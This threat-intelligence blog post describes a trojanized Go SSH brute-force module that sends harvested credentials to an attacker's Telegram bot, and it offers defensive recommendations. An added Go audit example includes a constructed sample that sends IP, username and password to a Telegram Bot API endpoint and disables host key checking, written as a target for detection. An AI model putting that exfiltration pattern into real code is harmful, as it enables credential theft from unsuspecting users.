Trojanized Go Module Lures Script Kiddies
- SHAH MUHAMMAD ASH-SYAFIQ BIN SHAHRIL
- Sep 4
- 2 min read

A malicious Go module named “golang-random-ip-ssh-bruteforce” has been uncovered masquerading as a legitimate SSH brute-force utility. Distributed via the open-source repository pkg.go.dev, the package is tied to the now-deleted GitHub account IllDieAnyway (G3TT). Although it functions as advertised, scanning random IPv4 addresses and attempting SSH logins with weak credentials, the module contains hidden exfiltration code that automatically transmits any valid credentials it obtains to a Telegram bot controlled by the threat actor.

This discovery underscores a growing trend in cybercrime: the weaponization of open-source ecosystems to mislead inexperienced users into acting as unwitting accomplices. By packaging malicious code inside a tool marketed toward aspiring hackers, the attacker effectively outsources scanning and password-guessing activities to unsuspecting operators. The scheme follows a parasitic model, in which novice threat actors (often referred to as “script kiddies”) unknowingly shoulder the operational workload and legal exposure, while the true author collects all rewards.

The dynamic can be compared to an ant colony, where the script kiddies serve as worker ants gathering “food” (compromised credentials), and the attacker, acting as the queen, reaps the benefits without ever leaving the nest. This approach allows the malicious actor to maintain anonymity, reduce operational risk, and consolidate stolen credentials with minimal effort.
Attack Details
Functionality:
• Scans random IPv4 addresses on TCP port 22 for open SSH services.
• Attempts logins using a hardcoded username/password list (root/admin with weak passwords such as 1234, qwerty, password, etc.).
• Disables SSH host key verification (ssh.InsecureIgnoreHostKey) to accept any server identity.
• Runs concurrent brute-force attempts for speed.
• On first successful login, sends IP address, username, and password to a Telegram bot (@sshZXC_bot) linked to attacker account @io_ping.
Command & Control (C2):
• Telegram Bot API used for exfiltration, making traffic resemble legitimate HTTPS web requests.
• The malicious module terminates after the first valid credential capture to ensure quick exfiltration.
Threat Actor Profile:
• Associated with offensive tools including IP scanners, Instagram parsers, and a PHP-based botnet called Selica-C2.
• Indicators (including Russian-language content and tool targeting) suggest Russian origin.
Impact
Unwitting Operators Compromised
• Users who run the tool do not retain control over discovered SSH credentials; they are instantly sent to the attacker.
Attribution Shielding
• Scanning and brute-force attempts are traced to the operator’s IP, not the actual threat actor.
Supply Chain Risk
• The malicious module remains publicly available on pkg.go.dev, increasing the risk of wider adoption.
Potential Target Exposure
• Any SSH service using weak credentials (root/admin) is vulnerable to compromise.
The attacker effectively builds a distributed, risk-free scanning network powered by victims who believe they are the attackers themselves.
Recommendation
For Developers / Security Teams
• Avoid downloading offensive security tools from unverified sources.
• Audit any open-source package prior to use; inspect the code for network calls or hardcoded exfiltration logic.
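One way to carry out that audit for the two constructs this write-up describes (a hard-coded Telegram Bot API endpoint and ssh.InsecureIgnoreHostKey) is a small go/ast walk over a package's source. This is an added example, not code from the original post or from the module itself; the sampleSrc it inspects is a constructed stand-in, and the function name AuditSource and the "line N: reason" output format are assumptions of this example.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"strings"
)
// AuditSource parses one Go file and returns "line N: reason" entries for the two
// constructs described above: a literal naming the Telegram Bot API host and ssh.InsecureIgnoreHostKey.
func AuditSource(filename, src string) ([]string, error) {
	fset := token.NewFileSet()
	file, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	var findings []string
	ast.Inspect(file, func(n ast.Node) bool {
		switch x := n.(type) {
		case *ast.BasicLit: // every string literal, wherever it appears
			if x.Kind == token.STRING && strings.Contains(x.Value, "api.telegram.org") {
				findings = append(findings, fmt.Sprintf("line %d: hard-coded Telegram Bot API endpoint", fset.Position(x.Pos()).Line))
			}
		case *ast.SelectorExpr: // ssh.InsecureIgnoreHostKey, whether called or passed as a value
			if pkg, ok := x.X.(*ast.Ident); ok && pkg.Name == "ssh" && x.Sel.Name == "InsecureIgnoreHostKey" {
				findings = append(findings, fmt.Sprintf("line %d: ssh host key verification disabled", fset.Position(x.Pos()).Line))
			}
		}
		return true
	})
	return findings, nil
}
// sampleSrc is a constructed stand-in for a trojanized module's main file, not the real package.
const sampleSrc = `package main
import "golang.org/x/crypto/ssh"
import "net/http"
func report(ip, user, pass string) {
	http.Get("https://api.telegram.org/bot<TOKEN>/sendMessage?text=" + ip + user + pass)
}
func dial(ip string) (*ssh.Client, error) {
	return ssh.Dial("tcp", ip+":22", &ssh.ClientConfig{HostKeyCallback: ssh.InsecureIgnoreHostKey()})
}
`

func main() {
	findings, err := AuditSource("main.go", sampleSrc)
	fmt.Println(findings, err)
}
```

Running it on a real package means feeding every .go file under the module root to AuditSource; a parse-only check like this catches the obvious hard-coded endpoint but not one that is assembled at runtime, so treat a clean result as a first pass, not a verdict.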
For Organizations Running SSH
• Enforce strong SSH passwords and disable password-based logins in favor of key-based authentication.
• Monitor for anomalous SSH login attempts from unexpected IP ranges.
For Threat Hunters
• Look for outbound connections to Telegram API endpoints from unusual hosts.
• Correlate SSH brute-force attempts with known indicators of compromise (IoCs), where available.